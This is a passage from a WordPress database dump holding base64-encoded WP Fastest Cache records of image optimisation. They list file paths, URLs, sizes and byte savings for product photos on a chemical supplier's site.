WVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0MtMTA2ODVfS3J5dG94X0ZQR18xODItR3JvdXAtMDYyNzE2LTc2OHg3NjguanBnIiwid2lkdGgiOjc2OCwiaGVpZ2h0Ijo3NjgsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvQy0xMDY4NV9Lcnl0b3hfRlBHXzE4Mi1Hcm91cC0wNjI3MTYtNzY4eDc2OC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9DLTEwNjg1X0tyeXRveF9GUEdfMTgyLUdyb3VwLTA2MjcxNi03Njh4NzY4LmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU3ODgyMywiaWQiOjk4Mn0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9DLTEwNjg1X0tyeXRveF9GUEdfMTgyLUdyb3VwLTA2MjcxNi0yNTB4MjUwLmpwZyIsIndpZHRoIjoyNTAsImhlaWdodCI6MjUwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0MtMTA2ODVfS3J5dG94X0ZQR18xODItR3JvdXAtMDYyNzE2LTI1MHgyNTAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvQy0xMDY4NV9Lcnl0b3hfRlBHXzE4Mi1Hcm91cC0wNjI3MTYtMjUweDI1MC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1Nzg4MjUsImlkIjo5ODJ9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvQy0xMDY4NV9Lcnl0b3hfRlBHXzE4Mi1Hcm91cC0wNjI3MTYtMjAweDIwMC5qcGciLCJ3aWR0aCI6MjAwLCJoZWlnaHQiOjIwMCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9DLTEwNjg1X0tyeXRveF9GUEdfMTgyLUdyb3VwLTA2MjcxNi0yMDB4MjAwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL0MtMTA2ODVfS3J5dG94X0ZQR18xODItR3JvdXAtMDYyNzE2LTIwMHgyMDAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTc4ODI3LCJpZCI6OTgyfSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0MtMTA2ODVfS3J5dG94X0ZQR18xODItR3JvdXAtMDYyNzE2LTIyNXgyMjUuanBnIiwid2lkdGgiOjIyNSwiaGVpZ2h0IjoyMjUsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvQy0xMDY4NV9Lcnl0b3hfRlBHXzE4Mi1Hcm91cC0wNjI3MTYtMjI1eDIyNS5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9DLTEwNjg1X0tyeXRveF9GUEdfMTgyLUdyb3VwLTA2MjcxNi0yMjV4MjI1LmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU3ODgyOSwiaWQiOjk4Mn0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9DLTEwNjg1X0tyeXRveF9GUEdfMTgyLUdyb3VwLTA2MjcxNi01MTB4NjAwLmpwZyIsIndpZHRoIjo1MTAsImhlaWdodCI6NjAwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0MtMTA2ODVfS3J5dG94X0ZQR18xODItR3JvdXAtMDYyNzE2LTUxMHg2MDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvQy0xMDY4NV9Lcnl0b3hfRlBHXzE4Mi1Hcm91cC0wNjI3MTYtNTEweDYwMC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1Nzg4MzIsImlkIjo5ODJ9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9DLTEwNjg1X0tyeXRveF9GUEdfMTgyLUdyb3VwLTA2MjcxNi0xMTR4MTMwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0MtMTA2ODVfS3J5dG94X0ZQR18xODItR3JvdXAtMDYyNzE2LTExNHgxMzAuanBnIiwid2lkdGgiOiIxMTQiLCJoZWlnaHQiOiIxMzAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvQy0xMDY4NV9Lcnl0b3hfRlBHXzE4Mi1Hcm91cC0wNjI3MTYtMTE0eDEzMC5qcGciLCJyZWR1Y3Rpb24iOjE3MywidGltZSI6MTQ4MzU3ODgzNCwiaWQiOjk4Mn0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0MtMTA2ODVfS3J5dG94X0ZQR18xODItR3JvdXAtMDYyNzE2LTE4MHgxODAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvQy0xMDY4NV9Lcnl0b3hfRlBHXzE4Mi1Hcm91cC0wNjI3MTYtMTgweDE4MC5qcGciLCJ3aWR0aCI6IjE4MCIsImhlaWdodCI6IjE4MCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9DLTEwNjg1X0tyeXRveF9GUEdfMTgyLUdyb3VwLTA2MjcxNi0xODB4MTgwLmpwZyIsInJlZHVjdGlvbiI6NSwidGltZSI6MTQ4MzU3ODgzNiwiaWQiOjk4Mn0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0MtMTA2ODVfS3J5dG94X0ZQR18xODItR3JvdXAtMDYyNzE2LTI0N3gzMDAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvQy0xMDY4NV9Lcnl0b3hfRlBHXzE4Mi1Hcm91cC0wNjI3MTYtMjQ3eDMwMC5qcGciLCJ3aWR0aCI6IjI0NyIsImhlaWdodCI6IjMwMCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9DLTEwNjg1X0tyeXRveF9GUEdfMTgyLUdyb3VwLTA2MjcxNi0yNDd4MzAwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU3ODgzOCwiaWQiOjk4Mn0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0MtMTA2ODVfS3J5dG94X0ZQR18xODItR3JvdXAtMDYyNzE2LTMwMHgzMDAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvQy0xMDY4NV9Lcnl0b3hfRlBHXzE4Mi1Hcm91cC0wNjI3MTYtMzAweDMwMC5qcGciLCJ3aWR0aCI6IjMwMCIsImhlaWdodCI6IjMwMCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9DLTEwNjg1X0tyeXRveF9GUEdfMTgyLUdyb3VwLTA2MjcxNi0zMDB4MzAwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU3ODg0MSwiaWQiOjk4Mn0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0MtMTA2ODVfS3J5dG94X0ZQR18xODItR3JvdXAtMDYyNzE2LTQwMHg0MDAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvQy0xMDY4NV9Lcnl0b3hfRlBHXzE4Mi1Hcm91cC0wNjI3MTYtNDAweDQwMC5qcGciLCJ3aWR0aCI6IjQwMCIsImhlaWdodCI6IjQwMCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9DLTEwNjg1X0tyeXRveF9GUEdfMTgyLUdyb3VwLTA2MjcxNi00MDB4NDAwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU3ODg0MywiaWQiOjk4Mn1d'); 
INSERT INTO `wp_postmeta` VALUES (29856, 976, 'wpfc_optimisation_reduction', '2764412'); 
INSERT INTO `wp_postmeta` VALUES (29857, 976, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvRWxhc3RvbWVyLUVQT1hZLmpwZyIsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvRWxhc3RvbWVyLUVQT1hZLmpwZyIsIndpZHRoIjozODg4LCJoZWlnaHQiOjI1OTIsIm1pbWVfdHlwZSI6IiIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9FbGFzdG9tZXItRVBPWFkuanBnIiwicmVkdWN0aW9uIjoyNzY0Mzk5LCJ0aW1lIjoxNDgzNTc4ODU1LCJpZCI6Ijk3NiJ9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvRWxhc3RvbWVyLUVQT1hZLTM0MHgzNDAuanBnIiwid2lkdGgiOjM0MCwiaGVpZ2h0IjozNDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvRWxhc3RvbWVyLUVQT1hZLTM0MHgzNDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvRWxhc3RvbWVyLUVQT1hZLTM0MHgzNDAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTc4ODU3LCJpZCI6OTc2fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0VsYXN0b21lci1FUE9YWS04MDB4NTMzLmpwZyIsIndpZHRoIjo4MDAsImhlaWdodCI6NTMzLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0VsYXN0b21lci1FUE9YWS04MDB4NTMzLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL0VsYXN0b21lci1FUE9YWS04MDB4NTMzLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU3ODg2MCwiaWQiOjk3Nn0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9FbGFzdG9tZXItRVBPWFktNzY4eDUxMi5qcGciLCJ3aWR0aCI6NzY4LCJoZWlnaHQiOjUxMiwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9FbGFzdG9tZXItRVBPWFktNzY4eDUxMi5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9FbGFzdG9tZXItRVBPWFktNzY4eDUxMi5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1Nzg4NjMsImlkIjo5NzZ9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvRWxhc3RvbWVyLUVQT1hZLTE2MDB4MTA2Ny5qcGciLCJ3aWR0aCI6MTYwMCwiaGVpZ2h0IjoxMDY3LCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0VsYXN0b21lci1FUE9YWS0xNjAweDEwNjcuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvRWxhc3RvbWVyLUVQT1hZLTE2MDB4MTA2Ny5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1Nzg4NjcsImlkIjo5NzZ9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvRWxhc3RvbWVyLUVQT1hZLTI1MHgyNTAuanBnIiwid2lkdGgiOjI1MCwiaGVpZ2h0IjoyNTAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvRWxhc3RvbWVyLUVQT1hZLTI1MHgyNTAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvRWxhc3RvbWVyLUVQT1hZLTI1MHgyNTAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTc4ODcwLCJpZCI6OTc2fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0VsYXN0b21lci1FUE9YWS0yMDB4MjAwLmpwZyIsIndpZHRoIjoyMDAsImhlaWdodCI6MjAwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0VsYXN0b21lci1FUE9YWS0yMDB4MjAwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL0VsYXN0b21lci1FUE9YWS0yMDB4MjAwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU3ODg3MiwiaWQiOjk3Nn0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9FbGFzdG9tZXItRVBPWFktMjI1eDIyNS5qcGciLCJ3aWR0aCI6MjI1LCJoZWlnaHQiOjIyNSwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9FbGFzdG9tZXItRVBPWFktMjI1eDIyNS5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9FbGFzdG9tZXItRVBPWFktMjI1eDIyNS5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1Nzg4NzUsImlkIjo5NzZ9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvRWxhc3RvbWVyLUVQT1hZLTUxMHg2MDAuanBnIiwid2lkdGgiOjUxMCwiaGVpZ2h0Ijo2MDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvRWxhc3RvbWVyLUVQT1hZLTUxMHg2MDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvRWxhc3RvbWVyLUVQT1hZLTUxMHg2MDAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTc4ODc4LCJpZCI6OTc2fSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvRWxhc3RvbWVyLUVQT1hZLTExNHgxMzAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvRWxhc3RvbWVyLUVQT1hZLTExNHgxMzAuanBnIiwid2lkdGgiOiIxMTQiLCJoZWlnaHQiOiIxMzAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvRWxhc3RvbWVyLUVQT1hZLTExNHgxMzAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTc4ODgwLCJpZCI6OTc2fSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvRWxhc3RvbWVyLUVQT1hZLTE4MHgxODAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvRWxhc3RvbWVyLUVQT1hZLTE4MHgxODAuanBnIiwid2lkdGgiOiIxODAiLCJoZWlnaHQiOiIxODAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvRWxhc3RvbWVyLUVQT1hZLTE4MHgxODAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTc4ODgzLCJpZCI6OTc2fSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvRWxhc3RvbWVyLUVQT1hZLTI0N3gzMDAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvRWxhc3RvbWVyLUVQT1hZLTI0N3gzMDAuanBnIiwid2lkdGgiOiIyNDciLCJoZWlnaHQiOiIzMDAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvRWxhc3RvbWVyLUVQT1hZLTI0N3gzMDAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTc4ODg1LCJpZCI6OTc2fSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvRWxhc3RvbWVyLUVQT1hZLTMwMHgzMDAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvRWxhc3RvbWVyLUVQT1hZLTMwMHgzMDAuanBnIiwid2lkdGgiOiIzMDAiLCJoZWlnaHQiOiIzMDAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvRWxhc3RvbWVyLUVQT1hZLTMwMHgzMDAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTc4ODg4LCJpZCI6OTc2fSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvRWxhc3RvbWVyLUVQT1hZLTQwMHg0MDAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvRWxhc3RvbWVyLUVQT1hZLTQwMHg0MDAuanBnIiwid2lkdGgiOiI0MDAiLCJoZWlnaHQiOiI0MDAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvRWxhc3RvbWVyLUVQT1hZLTQwMHg0MDAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTc4ODkxLCJpZCI6OTc2fV0='); 
INSERT INTO `wp_postmeta` VALUES (29858, 975, 'wpfc_optimisation_reduction', '1382200'); 
INSERT INTO `wp_postmeta` VALUES (29859, 975, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwva3J5dG94LWZwZy0xMjguanBnIiwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9rcnl0b3gtZnBnLTEyOC5qcGciLCJ3aWR0aCI6MjIyMiwiaGVpZ2h0IjoxNjY2LCJtaW1lX3R5cGUiOiIiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwva3J5dG94LWZwZy0xMjguanBnIiwicmVkdWN0aW9uIjoxMzgyMTg3LCJ0aW1lIjoxNDgzNTc4OTAzLCJpZCI6Ijk3NSJ9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwva3J5dG94LWZwZy0xMjgtMzQweDM0MC5qcGciLCJ3aWR0aCI6MzQwLCJoZWlnaHQiOjM0MCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9rcnl0b3gtZnBnLTEyOC0zNDB4MzQwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGlu